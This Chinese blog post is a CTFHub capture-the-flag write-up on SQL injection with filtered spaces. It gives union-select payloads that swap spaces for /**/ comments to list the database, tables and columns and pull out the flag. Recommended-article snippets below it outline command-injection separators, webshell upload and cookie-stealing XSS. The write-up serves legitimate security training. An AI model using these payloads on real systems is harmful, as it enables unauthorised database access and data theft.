CTFHub-过滤空格

最新推荐文章于 2025-11-03 14:38:04 发布
原创 最新推荐文章于 2025-11-03 14:38:04 发布 · 784 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql

本文介绍了一种特殊的SQL注入攻击方式,即如何绕过空格过滤进行数据库信息的获取。通过使用内联注释符/**/替代空格,成功地从目标数据库中提取了库名、表名及列名等关键信息。

过滤空格

  1. 在输入1后,并不回显有效信息,考虑到应用注释符,注释符/**/为内联注释符,可以将空格过滤
    在这里插入图片描述
  2. 可以判断该注入应为空格过滤,将所有的空格转化为/**/后进行查询flag,查询库名
    -1/**/union/**/select/**/database()
    在这里插入图片描述
  3. 查询该库名下的数据表
    -1/**/union/**/select/**/1,group/**/concat(table_name)/**/from/**/information_schema.tables/**/where/**/schema_table='sqli'
    在这里插入图片描述
    得出表名为news 和 jesvlygabd
  4. 然后查询jesvlygabd中的列名
    -1/**/union/**/select/**/1,group/**/concat(column_name)/**/from/**/information_schema.columns/**/where/**/schema_table='sqli'/**/and/**/table_name='jesvlygabd'
    在这里插入图片描述
    得出列名为dlcrqcjudu
  5. 查询该库该表该列的所有字段
    -1/**/union/**/select/**/1,group/**/concat(dlcrqcjudu)/**/from/**/sqli.jesvlygabd
    在这里插入图片描述
    得出flag
CTFHub-web(过滤空格)
分享与记录
08-22 2502
1. 使用注释绕过 开始用//和#试了一下发现不行,用/**/可以 0/**/union/**/select/**/1,2 2. 获取数据库信息 0/**/union/**/select/**/1,database()/**/ 3. 获取表信息 0/**/union/**/select/**/1,group_concat(table_name)/**/ from/**/information_schema.tables/**/where/**/table_schema='sqli' 4. 获取
CTFHub_技能树_Web之SQL注入——过滤空格
Ho1aAs‘s Blog
12-23 1298
文章目录一、过滤空格的绕过二、注入过程Ⅰ、爆表名Ⅱ、爆列名Ⅲ、爆flag 一、过滤空格的绕过 一般注入语句为 ?id=0 union select database(),user() 由于过滤空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果 ():一对圆括号 +:加号 %09:TAB换行符的URL编码形式 /**/:块注释符 二、注入过程 依次尝试发现只能使用块注释符替换,那么开始注入: Ⅰ、爆表名 ?id=10/**/union/**/select/**/1,group_conc
CTFHub XSS通关:XSS-过滤空格
最新发布
mooyuan的网络安全博客
11-03 981
本文详细讲解CTFHub的XSS-过滤空格关卡的渗透实战全流程。首先通过代码审计分析靶场源码,发现存在XSS风险但会过滤空格字符。接着利用XSS平台创建项目获取攻击载荷,采用注释符绕过空格过滤构造有效payload。最后将包含窃取Cookie功能的XSS链接提交给Bot验证,成功获取管理员Cookie中的flag值。文章涵盖源码分析、载荷构造、平台使用和渗透技巧,为XSS注入实战提供了完整的技术参考。
CTFhub(eval执行,无过滤过滤cat,过滤空格过滤运算符)
ndjnddjxn的博客
04-02 1223
未发现什么,返回上一级目录?
CTFHub | 过滤空格
尼泊罗河伯的博客
06-20 1301
检查网页源代码发现这题如果有空格就不会执行,说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试,可以正常回显。
过滤空格ctfhub
2401_82985722的博客
04-02 812
注释过滤 /**/、/*!*/、//、#、--括号过滤 ()符号过滤 %00、%09、%20、%a0 %0a、%0b、%0c、%0d引号过滤 ' 、 "大小写过滤 大小写双关键字绕过 '+'正则表达式绕过 \s、\s*\s+ 表示匹配一个或多个空白字符,\s* 表示匹配零个或多个空白字符。
CTFHUB web-rce-过滤
2301_79783285的博客
12-18 991
回车键,即键盘上的ENTER键,是一个比较有用的键,在文字编辑时,回车键的作用是换行,在输入网址时回车键的作用是“转到”,在执行DOS命令时,回车键的作用是执行。
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2785
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFhub-RCE
weixin_64359465的博客
03-14 966
(因为通过前面的eval,我们已经知道了背后的操作系统是Linux,我们这里就缺省认为后面的关卡都是Linux,不再额外测试,直接使用Linux命令。cat、tac、more、less、head、tail、file -f、nl、sed、sort、uniq等。1.查看源码,可以知道过滤了 | ,& , cat ,flag, ctfhub,;flag_is_here是一个目录正常的payload已经没用了,需要使用命令分隔符。1.从代码中,可以看出,过滤了 | 和 & 两个字符,所以我们使用;
CTFHUB-文件上传
m0_64180167的博客
12-25 1563
注意要改名字 我在这出现了问题是我没改文件名字 一直上传失败 于是我又在后缀上加.php才上传成功。发现失败了 试错后发现 我们一定要把上传文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上传。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件上传 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上传。
ctfhub-过滤空格
m0_62094846的博客
12-15 1128
<?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/ /", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $res = $m; }...
CTFHUB技能树之SQL——过滤空格
weixin_73049307的博客
10-18 1526
sqlmap/tamper目录下有个space2comment.py脚本,可以将空格替换成/**/看样子可能不在数据库中,老样子,改成-1/**/union/**/select/**/1,2#(如果爆的速度有点慢就加上--threads=10)得知mksymzfdit表和news表。用/**/或%0a替代空格。得知pttmgmuffp列。无回显,说明是整数型注入。得知数据库名是sqli。
CTFhub 过滤空格
plant1234的博客
06-18 1029
过滤空格: 首先这题,我们得知道用/**/来代替我们语句中的空格 进行注入 首先启动环境用: 1' 1'/**/and/**/1=1# 1/**/and/**/1=1 1/**/and/**/1=2 测出是否有注入 然后就报出库名: 520/**/union/**/select/**/1,database() 在报出表名: 在报出字段: 在报出内容得到flag: ...
CTFhub】命令注入过滤空格
manerzi的博客
10-25 951
CTFhub】命令注入过滤空格
CTFHUB-过滤空格
Web学习之路
03-28 463
替换
CTFHub-RCE 命令注入-过滤空格
weixin_49727285的博客
05-31 537
【代码】CTFHub-RCE 命令注入-过滤空格
CTFHUB-WEB-SQL注入-过滤空格
weixin_43486981的博客
08-11 1052
一般的过滤空格可以使用注释符绕过,也就是用/**/替代空格 使用的工具:火狐浏览器渗透便携版 题目: 靶机环境:输入1会回显信息,输入错误的信息什么也不显示。 当使用带有空格注入语句时,会提示hacker 根据提示提示,将空格使用/**/代替进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag ...
CTFHub-空格过滤-wp
z1moq的博客
05-18 379
空格过滤 **原理:**在php中提前写好当输入字符中有空格时返回 “Hacker!!!” 来防止sql注入 空格为空字符,可用php中的多行注释/**/来代替空格,以正常执行sql语句 剩余做法与整数型注入相同
ctfhub过滤空格
06-28
CTFHub平台上,与过滤空格相关的题目通常涉及命令注入、RCE(远程代码执行)等场景,攻击者需要绕过对空格的限制来执行恶意命令。以下是几个相关题目的解题指南和技巧。 ### 命令注入 - 过滤空格 在某些CTFHub...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值